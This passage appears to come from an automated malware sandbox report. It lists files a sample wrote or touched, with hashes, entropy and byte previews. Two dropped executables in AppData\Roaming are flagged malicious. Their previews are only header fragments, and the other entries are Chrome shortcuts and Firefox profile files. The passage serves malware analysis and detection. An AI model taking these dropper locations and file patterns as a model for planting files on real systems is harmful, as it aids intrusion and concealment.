Preview:	'use strict';function k(){return function(){}}function n(a){return function(){return this[a]}}var q;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var r=da(this);function t(a,b){if(b)a:{var c=r;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}}.t("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f\|\|"")+"_"+e++,f)}function c(f,g

C:\Users\user\AppData\Local\Temp\tmpaddon

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	modified
Size (bytes):	491284
Entropy (8bit):	7.997725234203649
Encrypted:	true
SSDEEP:	12288:u8fhrUPE5+8TK1g9M6y5JJtuiA50eHgB2rAnavTQu:fZrUPE5I1g9M6yyZ0AgYra4Z
MD5:	09372174E83DBBF696EE732FD2E875BB
SHA1:	BA360186BA650A769F9303F48B7200FB5EACCEE1
SHA-256:	C32EFAC42FAF4B9878FB8917C5E71D89FF40DE580C4F52F62E11C6CFAB55167F
SHA-512:	B667086ED49579592D435DF2B486FE30BA1B62DDD169F19E700CD079239747DD3E20058C285FA9C10A533E34F22B5198ED9B1F92AE560A3067F3E3FEACC724F1
Malicious:	false
Preview:	PK...........V...,.}..........gmpopenh264.dll..\|.U.8.I.....`....&l.Vpm.5Sf.N.(.."..YXY.%....V:;.......>....u.-...U....(.E.?.ES.R..?...{'i...]}.}>._?Mr.....s.3s'....Ng.O0..m..?...z..4~{...w...H.\3{....U?Y..K..+W.-K......,_i.g.k....NJLL.j0F..y..[?}1..........'.G^.#..^.C..{1.~..>.i..=............>}i.......h..h..t..O..^>w..PY.n.e.>...%Q.3....&H.d9....tqZ..pg3....G@u!.........[.4h....E.w.Y...~_1.^.#!f.+,.au......,._..:&...{N..1..~p..~?..DJ..T.".,.vR....u..P........8D;.,.BOp..........D..'...q..l...;..6$.........9&.<.bU....dExynP..KK.........7~M.X....?.-Q.......zs......>..\...bv...y...s..+zN.Kr.(. .Ee.QRco.8..8.~..o..D.OT.5......O.gC.F.3..E......('..>......2Eu.5]l.t}.`...:j.....IW.u...J.....H.m.R.Tz.....O...*..Q...9..j.c.Uc...U8gD..q.^.3..\|..Q.g[..Q6Q.q.....GBg..F[.\...D.C.?:1.}.../.t ..`.....}..........@...8c.G.....o. .......TyK.....sS.S..a.a..LR.0.k,.</;"...L.!WDp.M....8r..S..kq..o.0.m.-..,Z.[...>.G....P~.\|.7TR...Ug.7.j......8Q>-.u..

C:\Users\user\AppData\RoamingCBFCFBFBFB.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1898496
Entropy (8bit):	7.950130111317579
Encrypted:	false
SSDEEP:	49152:5qE17IghRPKUd2LI/WYW+jNTxjgafw8TfzYBgx1ITA:5HdkRnSNTBg2/ug3WA
MD5:	8EF54B7689AF3A0FE5028BC42964BB26
SHA1:	DEBCB0EA69E4330873F281B0D9B34D15FC513ABC
SHA-256:	78305C8B5E8EAD6989A0AF09FC6ED8F2FF1B246C0487DFA78FB5B155B554CAE9
SHA-512:	8B2EE0C290A48F826BACAEAF949D7335B14F65DC8967D0BCB05AD386FDA9FAF5D6D016D66CE202CD7BE202EAF1981B6B17BB60DAE33DC085F28AAB9BE9D3986B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................J...........@...........................K..........@.................................W...k.............................J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .0*.........................@...qzeqbxes......0.....................@...qgghuozc......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\RoamingIJDGCAEBFI.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1909760
Entropy (8bit):	7.949641205972528
Encrypted:	false
SSDEEP:	49152:tlkWk0JDpvefwG7tfhTkSkB6K4uzolV8ApUS3xCMBfkkECS:taWvnvH0fhTsY7J3xCMR/
MD5:	2AF5EB9FB318C9A454DE54914E121031
SHA1:	FCBAEA817B8EB0D63BA7B31804BE2353D564BA93
SHA-256:	589EB31A43D44FE275C70BFC3F592965B9236B59645A7ED633BBEC66526D64AB
SHA-512:	5873029940644909567F97A6D4C78D78064E7FFF22CC5B90FDA5F8C31017B30CA7DD2FC7672F7AB7460EE49D6154ED23EF5A52EA0077D09347B0B9CA3E9839F4
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f..............................K...........@.......................... L......:....@.................................W...k...........................4.K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... . +.........................@...usoriijt......1.....................@...ymfuwjgb......K.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 26 17:10:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9842052369122727
Encrypted:	false
SSDEEP:	48:8IdzT7f8GH6idAKZdA19ehwiZUklqehuy+3:8Uv8jZy
MD5:	06321074A415972F179D6C24047DBD85
SHA1:	B29BEC406C7829AD5AD0CD20D2D413713D1107C1
SHA-256:	1BEC76014EC5528012349884E259A5B8A00470A6FCC5FB24B7F9DE41C6889B1A
SHA-512:	AB419A2F5781FD8F33415758F50AFE6D36EA57B679B1FB4BD5D5570AC7F536FBD286DDCECA4595A96EDCB2823351979241D1E38D938EE33E2F1B68CE143A7490
Malicious:	false
Preview:	L..................F.@.. ...$+.,............N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XE.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XE.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XE.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XE............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XG............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........#A.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 26 17:10:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9946756217225152
Encrypted:	false
SSDEEP:	48:8OTdzT7f8GH6idAKZdA1weh/iZUkAQkqehJy+2:8O1v8R9Q8y
MD5:	65EDE1AB52DF83E30D6AAD9187AF936C
SHA1:	44A282E5CAC4CBE2B2DD72742A9ABE71DACC555D
SHA-256:	6F6E44AC321BD1D5996517B2B61A142B329441863EDDE10A8F409D7B460B0EEA
SHA-512:	21EB61077A0D8FEA8E79EB6A12C801A9874469B34BCA9288E8057EA3372F71E2E0B962BAEE7B79CC0BD4FD8FE8BB0D0EFBD6A11331C86D32E7A1E667E9EE757E
Malicious:	false
Preview:	L..................F.@.. ...$+.,....Xro.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XE.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XE.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XE.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XE............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XG............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........#A.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.008079932297578
Encrypted:	false
SSDEEP:	48:8x4dzT7fsH6idAKZdA14tseh7sFiZUkmgqeh7svy+BX:8xkvnnVy
MD5:	98C6E9E5702292E7A83A56F0DBB0BFCB
SHA1:	EC00A83E909380AC0ED251159AF437D215A68882
SHA-256:	21400B0BEA780184A73E418DE038D5433A566F3C7259C89C0B0407811065177F
SHA-512:	D34B00D7035B5425F7D6C582F4F693DE78B26673623E16E7BA7D5495FDEC0295AA88DDB39BC4B8D19E7ED55799FBF49871FCDA5458FBE8DAD647C7E4573C6FAC
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XE.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XE.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XE.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XE............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........#A.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 26 17:10:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9983367516475665
Encrypted:	false
SSDEEP:	48:8vidzT7f8GH6idAKZdA1vehDiZUkwqehty+R:8vKv8Sny
MD5:	07162C0B2020BD3E697C8031DDDBE9CD
SHA1:	F7EC584D3C8BA59AD098EE8A8449DE6D4D6B7D41
SHA-256:	3C8DBD0C9917D289BCF2698EC8F79314538FD7317D66A901BB559ACC36C9DAB8
SHA-512:	297C651BD15177067FAAE2FE90741CF319430F44488AE015877440DCE938A76709DF2D399695A3435340BF24F2D3917ECE9491CEDC154ED698B1A47CCCA63787
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....X.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XE.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XE.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XE.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XE............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XG............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........#A.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 26 17:10:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.98708534836594
Encrypted:	false
SSDEEP:	48:8SdzT7f8GH6idAKZdA1hehBiZUk1W1qehLy+C:8av8i9ry
MD5:	77475FDFD4400DCC9A90B6241B6002C9
SHA1:	13203D024C3100E24906D9A0E77FC0361C825ED2
SHA-256:	31D67114A364B069CF18E64B72D60A10BE445A313AFBA99F0BC440E105C3D40C
SHA-512:	C879F77261A64A2418EB9B626CB0E03CFDF837865CF7AE95651A2D69939757A79FEA71E33BE9AACB791EC3494BE484031C028B053F3588295CA57E17C172856F
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....x.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XE.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XE.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XE.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XE............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XG............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........#A.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 26 17:10:12 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9947759998256966
Encrypted:	false
SSDEEP:	48:8ydzT7f8GH6idAKZdA1duT+ehOuTbbiZUk5OjqehOuTbVy+yT+:86v8cT/TbxWOvTbVy7T
MD5:	3B86AD907607120A8E9D22E0D6CD5A1B
SHA1:	77CC9065D2CC7DF07B5947D8768818B3B1AC9081
SHA-256:	CBF8CF47F204E44ABCA80B46AF6814465E4CB3B4AB4132714C38E50E665917D6
SHA-512:	D162B3A5722BD3EF91000EAFB5EAAD01DA5A2F2C7F5D9AF9179ED31C333CE7A55B457E3684FBCA14151D3AEE6D03EC30E51BADAED4505211E2E6222937FB5F75
Malicious:	false
Preview:	L..................F.@.. ...$+.,....Di2.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XE.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XE.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XE.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XE............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XG............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........#A.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\ExperimentStoreData.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (7240), with no line terminators
Category:	dropped
Size (bytes):	7240
Entropy (8bit):	5.003777321662772
Encrypted:	false
SSDEEP:	192:8S+OpU3OdwiOdkjULTB8q4LiLqcXl1H7OsH9KKH4zLqyYLP:8J10s1HtHLHCqy0
MD5:	606608640E7EEE5FCEA6368ABAD0C52D
SHA1:	BD40245C91C859F4C097087FF29EFEB0ABCFABF5
SHA-256:	3DBC6F460B68183413E115A47E7A01A38374398B7E5B54F91FE2894A9098C48B
SHA-512:	B8CBFC6FDFB737048FAAF6121D41E4715312F44F12A06038E4DD46902F266F0BF1E9D136A198D928C5458311F802A282EDCC6D8EB2BEC56A155F1CBD8FD4B615
Malicious:	false
Preview:	{"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"3ba649bc-be47-4b92-8762-21cab57bda3b","experimentType":"rollout","source":"rs-loader","userFacingName":"CSV Import (Release Rollout)","userFacingDescription":"This rollout enables users to import logins from a CSV file from the about:logins page.","lastSeen":"2023-10-04T13:40:33.697Z","featureIds":["cm-csv-import"],"prefs":[{"name":"signon.management.page.fileImport.enabled","branch":"default","featureId":"cm-csv-import","variable":"csvImport","originalValue":false}],"isRollout":true},"serp-ad-telemetry-rollout":{"slug":"serp-ad-telemetry-rollout","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pr

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\ExperimentStoreData.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (7240), with no line terminators
Category:	dropped
Size (bytes):	7240
Entropy (8bit):	5.003777321662772
Encrypted:	false
SSDEEP:	192:8S+OpU3OdwiOdkjULTB8q4LiLqcXl1H7OsH9KKH4zLqyYLP:8J10s1HtHLHCqy0
MD5:	606608640E7EEE5FCEA6368ABAD0C52D
SHA1:	BD40245C91C859F4C097087FF29EFEB0ABCFABF5
SHA-256:	3DBC6F460B68183413E115A47E7A01A38374398B7E5B54F91FE2894A9098C48B
SHA-512:	B8CBFC6FDFB737048FAAF6121D41E4715312F44F12A06038E4DD46902F266F0BF1E9D136A198D928C5458311F802A282EDCC6D8EB2BEC56A155F1CBD8FD4B615
Malicious:	false
Preview:	{"csv-import-release-rollout":{"slug":"csv-import-release-rollout","branch":{"slug":"enable-csv-import","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pre-95-support"},"features":[{"value":{"csvImport":true},"enabled":true,"featureId":"cm-csv-import"}]},"active":true,"enrollmentId":"3ba649bc-be47-4b92-8762-21cab57bda3b","experimentType":"rollout","source":"rs-loader","userFacingName":"CSV Import (Release Rollout)","userFacingDescription":"This rollout enables users to import logins from a CSV file from the about:logins page.","lastSeen":"2023-10-04T13:40:33.697Z","featureIds":["cm-csv-import"],"prefs":[{"name":"signon.management.page.fileImport.enabled","branch":"default","featureId":"cm-csv-import","variable":"csvImport","originalValue":false}],"isRollout":true},"serp-ad-telemetry-rollout":{"slug":"serp-ad-telemetry-rollout","branch":{"slug":"control","ratio":1,"feature":{"value":{},"enabled":false,"featureId":"this-is-included-for-desktop-pr

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addonStartup.json.lz4 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Mozilla lz4 compressed data, originally 22685 bytes
Category:	dropped
Size (bytes):	5330
Entropy (8bit):	6.600324151802226
Encrypted:	false
SSDEEP:	96:R2YbKsKNU2xWrp327tGmD4wBON6h6cHAHJVauvjZHjkTymdS1/qTMg6P:RTx2x2t0FDJ4NpkuvjdeplTMT
MD5:	C69D0F07590D1AF24DD71D40BAAB5BE0
SHA1:	B023F314926FB9295EB5FA7B66691205EAB23D7F
SHA-256:	E7236F7B00E65D1F51F21D9514B3BD7AA4209C0634C437BFF96CA767A9D9623C
SHA-512:	AEDBAB1902730DB95260B456FDCFBE746C24EAADDE106E42CCDADC41B0E59F603E1689328A6979B81356D96ACF86301C79445D36714A2723D2367248DEB66868
Malicious:	false
Preview:	mozLz40..X....{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1695865283000,"loader":null,"path":s.....xpi","recommendationStateA...rootURI":"jar:file:///C:/Program%20Files/M.......refox/browser/features/...... !/...unInSafeMode..wsignedD...telemetryKey..7%40R...:1.0.1","version":"..`},"pic..#in.....T.n..w...........S.......(.[......0....0"},"screenshots..T.r.....[.......(.V....-39.......},"webcompat-reporter...Ofals..&.z.....[.......(.]....=1.5.............<.)....p....d......1.z.!18...5.....startupData...pX.astentL..!er...webRequest%..onBefore...[[{"incognitoi.UtabId..!yp...."main_frame"],"url...."://login.microsoftonline.com/","..@us/L.dwindows...},["blocking"]],...Iimag...https://smartT.".f.....etp/facebook.svg",...Aplay....8`script...P.....-....-testbed.herokuapp\.`shims_..3.jsh.bexampl\|.......Pexten{..Q../?..s...S.J/_2..@&_3U..s7.addthis . ic...officialK......-angularjs/current/dist(..t.min.js...track.adB...net/s

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addonStartup.json.lz4.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Mozilla lz4 compressed data, originally 22685 bytes
Category:	dropped
Size (bytes):	5330
Entropy (8bit):	6.600324151802226
Encrypted:	false
SSDEEP:	96:R2YbKsKNU2xWrp327tGmD4wBON6h6cHAHJVauvjZHjkTymdS1/qTMg6P:RTx2x2t0FDJ4NpkuvjdeplTMT
MD5:	C69D0F07590D1AF24DD71D40BAAB5BE0
SHA1:	B023F314926FB9295EB5FA7B66691205EAB23D7F
SHA-256:	E7236F7B00E65D1F51F21D9514B3BD7AA4209C0634C437BFF96CA767A9D9623C
SHA-512:	AEDBAB1902730DB95260B456FDCFBE746C24EAADDE106E42CCDADC41B0E59F603E1689328A6979B81356D96ACF86301C79445D36714A2723D2367248DEB66868
Malicious:	false
Preview:	mozLz40..X....{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1695865283000,"loader":null,"path":s.....xpi","recommendationStateA...rootURI":"jar:file:///C:/Program%20Files/M.......refox/browser/features/...... !/...unInSafeMode..wsignedD...telemetryKey..7%40R...:1.0.1","version":"..`},"pic..#in.....T.n..w...........S.......(.[......0....0"},"screenshots..T.r.....[.......(.V....-39.......},"webcompat-reporter...Ofals..&.z.....[.......(.]....=1.5.............<.)....p....d......1.z.!18...5.....startupData...pX.astentL..!er...webRequest%..onBefore...[[{"incognitoi.UtabId..!yp...."main_frame"],"url...."://login.microsoftonline.com/","..@us/L.dwindows...},["blocking"]],...Iimag...https://smartT.".f.....etp/facebook.svg",...Aplay....8`script...P.....-....-testbed.herokuapp\.`shims_..3.jsh.bexampl\|.......Pexten{..Q../?..s...S.J/_2..@&_3U..s7.addthis . ic...officialK......-angularjs/current/dist(..t.min.js...track.adB...net/s

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addons.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	3.91829583405449
Encrypted:	false
SSDEEP:	3:YWGifTJE6iHQ:YWGif9EE
MD5:	3088F0272D29FAA42ED452C5E8120B08
SHA1:	C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
SHA-256:	D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
SHA-512:	B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
Malicious:	false
Preview:	{"schema":6,"addons":[]}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\addons.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	3.91829583405449
Encrypted:	false
SSDEEP:	3:YWGifTJE6iHQ:YWGif9EE
MD5:	3088F0272D29FAA42ED452C5E8120B08
SHA1:	C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
SHA-256:	D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
SHA-512:	B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
Malicious:	false
Preview:	{"schema":6,"addons":[]}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 10, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	229376
Entropy (8bit):	0.8965600349860272
Encrypted:	false
SSDEEP:	384:Q1zkVmvQhyn+Zoz67atkX1MMTNlH333JqN8j/LKXd75CuX:Q3tkFM0sCytd
MD5:	A67E9B621B90CF66AE78FA34E1D92363
SHA1:	79424D3DE88C9C0FA0A6F8946814B0EF75CE4141
SHA-256:	EE45CA04B71EE89D60CFC6CDB67CAE381E55261EDF5308456C952AE60770D71D
